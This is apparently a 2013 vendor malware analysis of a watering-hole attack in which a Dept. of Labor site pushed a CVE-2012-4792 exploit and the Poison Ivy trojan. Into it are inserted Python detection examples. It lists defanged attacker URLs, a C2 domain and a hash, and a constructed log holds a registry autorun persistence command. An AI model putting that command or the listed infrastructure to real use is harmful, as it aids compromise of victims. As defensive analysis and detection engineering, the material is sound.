
Part 1 – K.I.A. – US Dept. Labor Website Pushing Poison Ivy – CVE-2012-4792

May 1, 2013

UPDATED 11:30 am 5.4.13 – Correction – Microsoft confirms exploit is a zero-day as written up in Part 2

UPDATED 8:50 am 5.2.13 – Correction regarding Google black-holing of domain – details in analysis below

UPDATED 2:47 pm 5.1.13 – Now available – IOC file – Download Here!

On the evening of Tuesday, April 30th 2013, we received a tip that a site hosted by the United States Department of Labor (USDOL) had been compromised and was hosting malicious code. The site has since been fixed and law enforcement is investigating.

In addition, AlienVault also has a write-up of the same exploit here.

As many security companies, including Websense, have recently noted, the vast majority of web-based drive-by exploits are occurring from legitimate websites that are compromised with the specific intention of exploiting the website's visitors. Watering hole attacks gained notoriety over the last year as a method of infecting specific targets by compromising websites they are likely to visit.

In this case one US Federal department website, the Department of Labor, was compromised in order to target what are believed to be employees of the US Dept of Energy who work in nuclear weapons programs. As reported by NextGov, the Dept of Labor’s web pages that were hijacked in this compromise, the “Site Exposure Matrices”, list “nuclear-related illnesses linked to Energy facilities and toxicity levels at each location that might have sickened employees developing atomic weapons”. In other words, this attack bears the hallmarks of a classic watering hole attack targeting certain employees working in nuclear weapons for the Dept of Energy by compromising a website at the Dept of Labor they are likely to visit.

One highly effective way of getting on to an enterprise network is to infect its website where its employees are likely to visit. Naturally there will be collateral damage to other visitors to the website. In this case, the compromise was to simply insert a re-direct to another malicious website within a Javascript that runs on the DoL website. The re-directed website exploits a well-known vulnerability (CVE-2012-4792) in older versions of Internet Explorer v6 – v8 running on Windows XP machines. This profile fits the enterprise user machine profile typical of large enterprise and government agencies. The exploit was used to implant a variant of Poison Ivy remote access Trojan (RAT) mutated to change the PE magic number to evade network signatures. In the following continuation of our KIA series, Invincea security consultant Eddie Mitchell breaks down the exploit and how Invincea users are protected from this attack.

Armed with an Invincea protected browser (IE8, Windows XP 32-bit), we decided to investigate further.  Upon landing on the affected page, it only took a moment before we received the all too familiar alert notification from Invincea that an infection had been detected:

Image 1

Drilling into the Details link, we can observe the real-time activity of the captured malware inside the Invincea virtual container:

Image 2
As we can plainly see, a suspect executable has been dropped onto the virtual file system (conime.exe) and launched as a process.  Furthermore, we observe that network listeners have been opened as well as outbound network communications.  To obtain more forensic data related to this mock infection, we first click Restore to purge the virtual container of all changes and pivot to the Threat Data Server for more detail:

Image 3

Once we have located the appropriate infection entry as shown above, we can quickly see the total number of virtual system changes recorded as the malware was allowed to run inside the container, with breakdowns of the number of executables written, processes launched and network connections opened. In this case, 31 total changes were recorded with 2 distinct executable drops, 3 process launches and 3 network connections opened. We can also rapidly determine that there are two web redirects present on the main index page associated with www[.]sem[.]dol[.]gov. These redirects obviously lead to content hosted at dol[.]ns01[.]us, which led to the infection. Next, we’ll select the Timeline tab to get more detail on the infection chain of events:

Image 4

In the screen capture above, we can see that shortly after the browser was redirected to the content hosted at dol[.]ns01[.]us, a file previously downloaded to the browser cache is launched as a process. We can also see the MD5Sum of the offending process listed in the Event Properties window above.

Next, we can see that a network listener is opened on port 443 and several steps are taken to maintain persistence on the host. Reg.exe is launched from Windows\system32 in order to configure an autorun in the registry, and the malware copies itself to a more permanent location in the user’s %appdata% directory as “conime.exe”:

Image 5

Auto-run entry details:

Image 6

UPDATED 8:50 a.m. 5.2.13 –

Next, the malware opens additional network listeners on port 53 and 8080 as well as attempts to contact its command and control (C2) server for instructions.  The C2 domain associated with this sample is microsoftupdate[.]ns1[.]name which resolved to (Google) at the time of the original analysis.  The domain is currently resolving to (Xerox Corporation) which may indicate that the attackers are attempting to avoid attribution efforts by the security research community.
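The host-side behaviour described so far (a process launched from the browser cache, an autorun entry written through reg.exe, a copy of the payload as conime.exe under the user's %appdata% directory, and listeners on 443, 53 and 8080 opened from that copy) can be turned into endpoint detection logic. The following is an added example, not code from the Invincea post or the Invincea product: it runs simple rules over a constructed, pipe-separated event log whose format and file paths are assumptions for illustration, and it generalises the conime.exe case to any copy of a Windows system binary name placed outside C:\Windows.

```python
import re

# Constructed sample host events (not output from the Invincea Threat Data Server).
# Assumed format: timestamp|event_type|process_or_file_image|detail
SAMPLE_EVENTS = r"""
2013-05-01T09:12:01|ProcessCreate|C:\Documents and Settings\user\Local Settings\Temporary Internet Files\bookmark[1].png|
2013-05-01T09:12:02|ProcessCreate|C:\WINDOWS\system32\reg.exe|reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v conime /d "C:\Documents and Settings\user\Application Data\conime.exe"
2013-05-01T09:12:02|FileCreate|C:\Documents and Settings\user\Application Data\conime.exe|
2013-05-01T09:12:03|NetworkListen|C:\Documents and Settings\user\Application Data\conime.exe|443
2013-05-01T09:12:03|NetworkListen|C:\Documents and Settings\user\Application Data\conime.exe|53
2013-05-01T09:12:03|NetworkListen|C:\Documents and Settings\user\Application Data\conime.exe|8080
2013-05-01T09:12:10|ProcessCreate|C:\WINDOWS\system32\conime.exe|
2013-05-01T09:13:00|NetworkListen|C:\Program Files\Apache\httpd.exe|8080
"""

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)          # HKCU/HKLM ...\Run autorun keys
APPDATA = re.compile(r"\\Application Data\\|\\AppData\\", re.I)  # XP and Vista+ profile locations
BROWSER_CACHE = re.compile(r"Temporary Internet Files", re.I)
SUSPECT_PORTS = {443, 53, 8080}   # ports the sample listened on (from the analysis above)
SYSTEM_NAMES = {"conime.exe"}     # legitimate system binary names the sample masqueraded as


def analyze(events_text):
    """Return a list of (timestamp, finding_kind, evidence) tuples."""
    findings = []
    for line in events_text.strip().splitlines():
        if not line.strip():
            continue
        ts, etype, image, detail = line.split("|", 3)
        name = image.rsplit("\\", 1)[-1].lower()
        in_windows_dir = image.lower().startswith("c:\\windows\\")

        # 1. reg.exe writing an autorun value: persistence
        if etype == "ProcessCreate" and name == "reg.exe" and RUN_KEY.search(detail):
            findings.append((ts, "autorun-persistence", detail))
        # 2. a system binary name created outside the Windows directory: masquerading
        elif etype == "FileCreate" and name in SYSTEM_NAMES and not in_windows_dir:
            findings.append((ts, "system-binary-masquerade", image))
        # 3. anything executed straight out of the browser cache
        elif etype == "ProcessCreate" and BROWSER_CACHE.search(image):
            findings.append((ts, "exec-from-browser-cache", image))
        # 4. a user-profile executable listening on server-style ports
        elif etype == "NetworkListen" and int(detail) in SUSPECT_PORTS and APPDATA.search(image):
            findings.append((ts, "userland-listener", f"{name}:{detail}"))
    return findings


if __name__ == "__main__":
    for ts, kind, evidence in analyze(SAMPLE_EVENTS):
        print(f"{ts}  {kind:28s} {evidence}")
```

The real conime.exe launched from system32 and the web server listening on 8080 from Program Files produce no findings, which is the point of keying the rules on location rather than on the file name or port alone.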

During the initial C2 contact, the client attempts to send an encrypted payload of exactly 256 bytes to the C2 server over port 443 as seen below:

Image 8

This behavior is highly consistent with the Poison Ivy RAT as previously described by Gal Badishi of Cyvera in this blog posting.
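A first client-to-server message of exactly 256 bytes on TCP/443 that is not a TLS record is a usable network indicator for this family. The following is an added example (not code from the Invincea post, and not a reimplementation of the Poison Ivy protocol) that classifies the first payload of a flow: it checks whether the bytes form a valid TLS record header, whether they look like plaintext HTTP, and otherwise whether they match the 256-byte, high-entropy profile described above. The TLS ClientHello, HTTP request and "encrypted" blob are all constructed inline; the blob is a SHA-256 chain standing in for ciphertext.

```python
import hashlib
import math
from collections import Counter


def entropy(data):
    """Shannon entropy in bits per byte of a byte string."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_tls_record(data):
    """True if data starts with a plausible TLS record header (type, version 3.x, length)."""
    if len(data) < 5:
        return False
    rec_type, major, minor = data[0], data[1], data[2]
    length = int.from_bytes(data[3:5], "big")
    return rec_type in (0x14, 0x15, 0x16, 0x17) and major == 3 and minor <= 4 and length <= len(data) - 5


def classify_first_payload(data, dst_port):
    """Label the first client payload of a TCP flow."""
    if is_tls_record(data):
        return "tls"
    if data[:4] in (b"GET ", b"POST", b"HEAD", b"PUT "):
        return "http-plaintext"
    # Profile from the analysis above: 256 bytes, encrypted-looking, sent to 443 without TLS.
    if dst_port == 443 and len(data) == 256 and entropy(data) > 6.5:
        return "suspect-poisonivy-handshake"
    return "unknown-non-tls"


def constructed_blob(seed=b"constructed", n=256):
    """Constructed stand-in for an encrypted 256-byte beacon (a SHA-256 chain)."""
    out, h = b"", seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:n]


# Constructed samples.
TLS_HELLO = (b"\x16\x03\x01\x00\x2f"                 # record: handshake, TLS 1.0, 47 bytes
             + b"\x01\x00\x00\x2b\x03\x03" + bytes(32)  # ClientHello, version, random
             + b"\x00\x00\x02\x00\x2f\x01\x00\x00\x00")  # no session id, one suite, null compression
HTTP_GET = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
BEACON = constructed_blob()

if __name__ == "__main__":
    for label, payload, port in (("tls", TLS_HELLO, 443), ("http", HTTP_GET, 80), ("beacon", BEACON, 443)):
        print(f"{label:7s} -> {classify_first_payload(payload, port)}")
```

On real traffic the classifier would be fed the first client segment of each 443 flow; the TLS check is what keeps ordinary HTTPS from being flagged.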

If we go back to the Processes tab in our Invincea threat analyzer, we can perform a hash check on our malware:

Image 9

The results indicate that this Poison Ivy sample has an extremely low antivirus detection ratio (2/46):

Image 10

Now, let’s backtrack and review the infection chain of events.

The main index page of www[.]sem[.]dol[.]gov contains an embedded script:

Image 11

If we examine the contents of textsize.js, we can see that the DOM createElement() method is used to write a script tag on the page pointing to hxxp://dol[.]ns01[.]us:8081/web/xss.php as well as an iframe leading to hxxp://dol[.]ns01[.]us:8081/update/index.php:


Image 12
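The injection pattern described above, a trusted first-party script using createElement() to add a script tag and an iframe that load from a different host on a non-standard port, can be checked for when reviewing site content. The following is an added example, not code from the Invincea post or from the Dept of Labor site: the sample JavaScript is constructed to mirror the described textsize.js behaviour, and the scanner pairs each createElement('script'|'iframe') with the src later assigned to that variable and reports loads that are off-origin or use a non-standard port.

```python
import re
from urllib.parse import urlsplit

# Constructed JavaScript modelled on the described injection (not the real textsize.js).
SAMPLE_JS = r'''
function setTextSize(sz) { document.body.style.fontSize = sz; }   // legitimate helper
var s = document.createElement("script");
s.src = "http://dol.ns01.us:8081/web/xss.php";
document.body.appendChild(s);
var f = document.createElement("iframe");
f.src = "http://dol.ns01.us:8081/update/index.php";
f.width = 0; f.height = 0;
document.body.appendChild(f);
var ok = document.createElement("script");
ok.src = "https://www.sem.dol.gov/js/analytics.js";
document.body.appendChild(ok);
var rel = document.createElement("script");
rel.src = "/js/print.js";
'''

CREATE_RE = re.compile(r"""(\w+)\s*=\s*document\.createElement\(\s*['"](script|iframe)['"]\s*\)""", re.I)


def find_injected_loads(js_source, page_host):
    """Return [(tag, url, [reasons])] for dynamically created script/iframe loads worth reviewing."""
    findings = []
    for m in CREATE_RE.finditer(js_source):
        var, tag = m.group(1), m.group(2).lower()
        # Look for "<var>.src = '...'" after the element is created.
        src = re.search(r"\b" + re.escape(var) + r"\.src\s*=\s*['\"]([^'\"]+)['\"]", js_source[m.end():])
        if not src:
            continue
        url = src.group(1)
        parts = urlsplit(url)
        if not parts.netloc:          # relative URL: same origin by construction
            continue
        host = (parts.hostname or "").lower()
        reasons = []
        if not (host == page_host or host.endswith("." + page_host)):
            reasons.append("off-origin")
        if parts.port not in (None, 80, 443):
            reasons.append(f"nonstandard-port:{parts.port}")
        if reasons:
            findings.append((tag, url, reasons))
    return findings


if __name__ == "__main__":
    for tag, url, reasons in find_injected_loads(SAMPLE_JS, "www.sem.dol.gov"):
        print(f"{tag:6s} {url}  [{', '.join(reasons)}]")
```

The same-origin script and the relative path are not reported; only the two loads from dol.ns01.us:8081 are, each for both reasons.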


The contents of xss.php include javascript functions to fingerprint vulnerable browser plugins as well as perform identification of popular endpoint security solutions that may be installed.  After completing the checks, the information is sent via an HTTP POST operation to hxxp://dol[.]ns01[.]us:8081/web/js.php as seen below:

Image 13

index.php from our iframe above is where the code to exploit the browser lies:

Image 14

Above, we can see that the javascript checks that the browser language is English and that the operating system is Windows XP based on the User-Agent string.  If these conditions are met, execution is passed to the helo() function contained in a Base64 encoded blob.  You can also notice above that “bookmark.png” (our malware payload) is downloaded into the browser cache.  Once the browser is successfully exploited, the shellcode executes the malware payload.


The following screenshot illustrates the malware download (bookmark.png – md5: a449fdcc2e15655c9f720247646913e4).  Note that the PE magic number has been altered to avoid network detection signatures that rely on the presence of “MZ”:


Image 15
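Because the sample's DOS magic was changed, a detection that only looks for the "MZ" bytes at offset 0 misses it. A PE file can still be recognised from the rest of its header: the e_lfanew field at offset 0x3C points at the "PE\0\0" signature, which is followed by the COFF header. The following is an added example (not code from the Invincea post, and not a parser for the actual bookmark.png sample) that builds a minimal constructed PE header, corrupts its first two bytes the way the text describes, and shows a classifier that keys on e_lfanew and the PE signature rather than on "MZ".

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C


def pe_signature_info(data):
    """Inspect a file's leading bytes without trusting the DOS 'MZ' magic."""
    info = {"mz_present": data[:2] == b"MZ", "pe_offset": None, "pe_signature": False, "machine": None}
    if len(data) < 0x40:
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    info["pe_offset"] = e_lfanew
    # Sanity bound: the signature must sit past the DOS header and leave room for the COFF header.
    if 0x40 <= e_lfanew <= len(data) - 24 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
        info["pe_signature"] = True
        info["machine"] = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return info


def classify_executable(data):
    info = pe_signature_info(data)
    if info["pe_signature"] and not info["mz_present"]:
        return "pe-with-altered-dos-magic"   # the evasion described in the post
    if info["pe_signature"]:
        return "pe"
    return "not-pe"


def build_minimal_pe():
    """Constructed 88-byte PE header: DOS stub with e_lfanew=0x40, then 'PE\\0\\0' and a COFF header."""
    dos_header = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 0xE0, 0x102)
    return dos_header + b"PE\0\0" + coff


SAMPLE_PE = build_minimal_pe()
ALTERED_PE = b"\x00\x00" + SAMPLE_PE[2:]              # DOS magic overwritten, as in the post
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(80)           # a real PNG header: must not be flagged

if __name__ == "__main__":
    for label, blob in (("intact", SAMPLE_PE), ("altered", ALTERED_PE), ("png", FAKE_PNG)):
        print(f"{label:8s} -> {classify_executable(blob)}  {pe_signature_info(blob)}")
```

The check is intentionally loose on the DOS header and strict on the PE signature, since the Windows loader itself requires a valid e_lfanew and "PE\0\0" but downstream tooling often stops at the first two bytes.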

It is important to note that most websites are vulnerable to exploit. As a result, exploiting legitimate websites has become a common vector for penetrating enterprise networks and individual machines. The Department of Labor is no exception. Their website was compromised to host a re-direct to a malicious website. The target of this attack appears to be employees of the Dept of Energy who likely work in nuclear weapons research. In addition, AlienVault is reporting that this attack has indicators of compromise that link to the DeepPanda Chinese APT group. This compromise shows that watering hole attacks continue to be employed by advanced threat actors using exploits customized to their target profile. The malicious website re-direct exploits an older vulnerability in Internet Explorer on Windows XP machines that fit the typical configuration of enterprise user machines. Invincea users are protected against this attack as they are against other web-based drive-by and spear-phishing attacks.
